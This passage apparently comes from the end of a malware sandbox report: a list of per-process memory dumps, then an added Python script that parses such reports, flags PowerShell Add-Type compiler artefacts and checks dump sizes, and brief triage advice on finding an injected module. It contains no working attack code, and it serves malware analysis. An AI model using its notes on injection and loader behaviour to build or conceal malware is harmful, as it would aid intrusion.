                                                                  • memory/4068-153-0x0000000000000000-mapping.dmp

                                                                  • memory/4068-202-0x0000000000000000-mapping.dmp

                                                                  • memory/4188-163-0x0000000000000000-mapping.dmp

                                                                  • memory/4208-169-0x0000000000000000-mapping.dmp

                                                                  • memory/4244-161-0x0000000000000000-mapping.dmp

                                                                  • memory/4296-194-0x0000000000000000-mapping.dmp

                                                                  • memory/4324-213-0x0000000000000000-mapping.dmp

                                                                  • memory/4344-167-0x0000000000000000-mapping.dmp

                                                                  • memory/4348-218-0x0000000000000000-mapping.dmp

                                                                  • memory/4380-158-0x000001F2D6D00000-0x000001F2D6D3D000-memory.dmp

                                                                    Filesize

                                                                    244KB

                                                                  • memory/4380-141-0x000001F2D6B20000-0x000001F2D6B42000-memory.dmp

                                                                    Filesize

                                                                    136KB

                                                                  • memory/4380-157-0x00007FF8D9E80000-0x00007FF8DA941000-memory.dmp

                                                                    Filesize

                                                                    10.8MB

                                                                  • memory/4380-140-0x0000000000000000-mapping.dmp

                                                                  • memory/4380-142-0x00007FF8D9E80000-0x00007FF8DA941000-memory.dmp

                                                                    Filesize

                                                                    10.8MB

                                                                  • memory/4396-230-0x0000000000000000-mapping.dmp

                                                                  • memory/4540-131-0x0000000010000000-0x000000001000E000-memory.dmp

                                                                    Filesize

                                                                    56KB

                                                                  • memory/4540-136-0x0000000000BE0000-0x0000000000BED000-memory.dmp

                                                                    Filesize

                                                                    52KB

                                                                  • memory/4540-130-0x0000000000000000-mapping.dmp

                                                                  • memory/4552-173-0x000001BCBF400000-0x000001BCBF4A3000-memory.dmp

                                                                    Filesize

                                                                    652KB

                                                                  • memory/4564-219-0x0000000000000000-mapping.dmp

                                                                  • memory/4600-188-0x0000000000000000-mapping.dmp

                                                                  • memory/4680-199-0x0000000000000000-mapping.dmp

                                                                  • memory/4836-207-0x0000000000000000-mapping.dmp

                                                                  • memory/4860-221-0x0000000000000000-mapping.dmp

                                                                  • memory/4928-204-0x0000000000000000-mapping.dmp

                                                                  • memory/5052-192-0x0000000000000000-mapping.dmp
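The entries above are a flattened record set (a bullet naming the path, then field name and value on alternating lines), and each memory entry encodes the dumped address range in its name. The script below is an added example, not part of the sandbox report: it parses that layout, validates hash lengths, groups repeated writes of the same path by distinct SHA256 (343A.bin1 is written several times with changing content), flags the temp-folder artefacts that PowerShell Add-Type leaves behind when it drives csc.exe (a random eight-character directory holding name.cmdline, name.0.cs, name.dll and a CSC*.TMP file; the RES*.tmp files alongside them come from cvtres.exe), and reconciles each memory dump's address range with its Filesize label. The sample input is a constructed excerpt of entries copied from this page with SHA512 left out; the regular expressions and function names are the example's own.

```python
"""Parse dropped-file and memory-region entries from the report layout above.
Added example, not part of the sandbox report; assumes the '•' + field/value
line layout seen on this page."""
import re
from collections import defaultdict

# Constructed excerpt: six entries copied from the report (SHA512 omitted).
SAMPLE_REPORT = r"""
• C:\Users\Admin\AppData\Local\Temp\343A.bin1
  Filesize
  64KB
  MD5
  02fdc24f3a1c19cfa74983fae1cf014a
  SHA1
  6d7eaa6f24f588343b7d69cf2f1ec9e6d2295462
  SHA256
  0eb080f7a289e78baf814518fc45c408c00f7a2f69af9c217e04d5476ea5c400
• C:\Users\Admin\AppData\Local\Temp\343A.bin1
  Filesize
  65KB
  MD5
  1474718875d6962a725dd676ecc738c6
  SHA1
  7a63d76d07df9e7088b290a8d13250e1e5ddd490
  SHA256
  8fee96446f545c3c25c84e48d89385f5a6dda65c2c31b674b83ba1ef9fd3169d
• \??\c:\Users\Admin\AppData\Local\Temp\accmwzpw\accmwzpw.cmdline
  Filesize
  369B
  MD5
  beba16e59f02318fd5747b8d7be8ec2f
• \??\c:\Users\Admin\AppData\Local\Temp\accmwzpw\CSCFFAEDFB65E064C8FA99B587AB452037.TMP
  Filesize
  652B
• memory/4540-131-0x0000000010000000-0x000000001000E000-memory.dmp
  Filesize
  56KB
• memory/864-143-0x0000000000000000-mapping.dmp
"""

HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
FIELDS = {"Filesize", *HASH_LEN}
# memory/<pid>-<n>-0x<start>[-0x<end>]-(memory|mapping).dmp
MEM_RE = re.compile(r"^memory/(\d+)-\d+-0x([0-9A-Fa-f]+)-(?:0x([0-9A-Fa-f]+)-)?(memory|mapping)\.dmp$")
# Files PowerShell Add-Type leaves in %TEMP%\<8 random chars>\ when it runs csc.exe
CSC_RE = re.compile(r"\\temp\\[a-z0-9]{8}\\(?:[a-z0-9]{8}\.(?:cmdline|0\.cs|dll)|csc[0-9a-f]+\.tmp)$", re.I)


def parse_report(text):
    """Return one dict per '•' entry: {'name': path, 'Filesize': ..., 'MD5': ...}."""
    records = []
    for chunk in re.split(r"^\s*•\s*", text, flags=re.M):
        lines = [ln.strip() for ln in chunk.splitlines() if ln.strip()]
        if not lines:
            continue
        rec = {"name": lines[0]}
        for key, val in zip(lines[1::2], lines[2::2]):  # alternating field / value
            if key in FIELDS:
                rec[key] = val
        records.append(rec)
    return records


def check_hashes(rec):
    """Names of hash fields whose value is not lowercase hex of the expected length."""
    return [a for a, n in HASH_LEN.items()
            if a in rec and not re.fullmatch(r"[0-9a-f]{%d}" % n, rec[a])]


def rewritten_paths(records):
    """path -> ordered distinct SHA256 values; more than one means the file was overwritten."""
    seen = defaultdict(list)
    for r in records:
        h = r.get("SHA256")
        if h and h not in seen[r["name"]]:
            seen[r["name"]].append(h)
    return {p: hs for p, hs in seen.items() if len(hs) > 1}


def csc_artifacts(records):
    """Entries matching the csc.exe / Add-Type temp-file pattern."""
    return [r["name"] for r in records if CSC_RE.search(r["name"])]


def parse_memory(name):
    """(pid, start, size_in_bytes) for a memory/... entry, else None; mapping dumps have size 0."""
    m = MEM_RE.match(name)
    if not m:
        return None
    pid, start, end, _kind = m.groups()
    size = int(end, 16) - int(start, 16) if end else 0
    return int(pid), int(start, 16), size


def human_size(n):
    """Format a byte count the way the report labels Filesize (56KB, 1.2MB, 652B)."""
    if n < 1024:
        return f"{n}B"
    if n < 1024 ** 2:
        return f"{n // 1024}KB"
    return f"{n / 1024 ** 2:.1f}MB"


def region_size_matches(rec):
    """True/False if a memory dump's address range agrees with its Filesize label, else None."""
    mem = parse_memory(rec["name"])
    if mem is None or "Filesize" not in rec:
        return None
    return human_size(mem[2]) == rec["Filesize"]


def summarize(text):
    records = parse_report(text)
    return {
        "records": len(records),
        "bad_hashes": [r["name"] for r in records if check_hashes(r)],
        "rewritten": rewritten_paths(records),
        "csc_artifacts": csc_artifacts(records),
        "region_mismatch": [r["name"] for r in records if region_size_matches(r) is False],
    }


if __name__ == "__main__":
    for k, v in summarize(SAMPLE_REPORT).items():
        print(k, v)
```

Run against the full list, the same 652KB region is dumped from four processes (3116, 3576, 3828 and 4552), which, next to the SetThreadContext signature in the summary, is the region to diff first when hunting for the injected module. The two .0.cs files (400B and 410B) are the C# source that was compiled; the report records only their hashes, so pull them from the sandbox to see what the loader built.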